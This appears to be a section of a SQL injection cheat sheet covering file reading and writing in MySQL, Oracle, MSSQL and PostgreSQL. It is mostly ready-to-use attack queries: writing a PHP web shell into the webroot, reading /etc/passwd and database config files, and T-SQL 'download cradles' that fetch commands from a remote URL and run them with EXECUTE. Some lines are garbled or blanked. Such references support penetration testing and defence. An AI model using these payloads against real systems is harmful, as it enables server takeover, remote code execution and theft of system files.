Reading and Writing Files

Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.

* Requires privileged user

Description Query
Dump to file SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
Dump PHP Shell SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
Read File SELECT LOAD_FILE('/etc/passwd')
Read File Obfuscated SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
reads c:\boot.ini
File Privileges SELECT file_priv FROM mysql.user WHERE user = 'netspi'
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%'

UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

Java can be used to read and write files if it's installed (it is not available in Oracle Express).

* Requires privileged user

Description Query
Download Cradle bulk in server - TSQL -- Bulk Insert - Download Cradle Example

-- Setup variables
Declare @cmd varchar(8000)

-- Create temp table
CREATE TABLE #file (content nvarchar(4000));

-- Read file into temp table - web server must support propfind
BULK INSERT #file FROM '\\\Path\to\file.txt';

-- Select contents of file
SELECT @cmd = content FROM #file

-- Display command

-- Run command

-- Drop the temp table
Download Cradle OAP 1 - TSQL -- OLE Automation Procedure - Download Cradle Example
-- Does not require a table, but can't handle larger payloads

-- Note: This also works with unc paths \\ip\file.txt
-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind.

-- Setup Variables
DECLARE @url varchar(300)
DECLARE @handle int
DECLARE @Command varchar(8000)

-- Set target url containting TSQL
SET @url = ''

-- Setup namespace
EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT

-- Call the Open method to setup the HTTP request
EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'

-- Call the Send method to send the HTTP GET request
EXEC @handle=sp_OAMethod @WinHTTP,'Send'

-- Capture the HTTP response content
EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out

-- Destroy the object
EXEC @handle=sp_OADestroy @WinHTTP

-- Display command
SELECT @Command

-- Run command
EXECUTE (@Command)
Download Cradle OAP 2 - TSQL -- OLE Automation Procedure - Download Cradle Example - Option 2
-- Can handle larger payloads, but requires a table

-- Note: This also works with unc paths \\ip\file.txt
-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind.

-- Setup Variables
DECLARE @url varchar(300)
DECLARE @Handle int
DECLARE @Command varchar(8000)

-- Set target url containting TSQL
SET @url = ''

-- Create temp table to store downloaded string
CREATE TABLE #text(html text NULL)

-- Setup namespace
EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT

-- Call open method to configure HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'

-- Call Send method to send the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP,'Send'

-- Capture the HTTP response content
INSERT #text(html)
EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'

-- Destroy the object
EXEC @Handle=sp_OADestroy @WinHTTP

-- Display the commad
SELECT @Command = html from #text
SELECT @Command

-- Run the command
EXECUTE (@Command)

-- Remove temp table
Reading Files - TSQL
Writing Files - TSQL

* Requires privileged user

Description Query
Read Files from Operating System - COPY CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd';
SELECT * FROM mydata;
DROP TABLE mytest mytest;
Read Files from Operating System - pg_read_file SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200);
Writing Files from Operating System CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('');
COPY mytable (mycol) TO '/var/www/test.php';

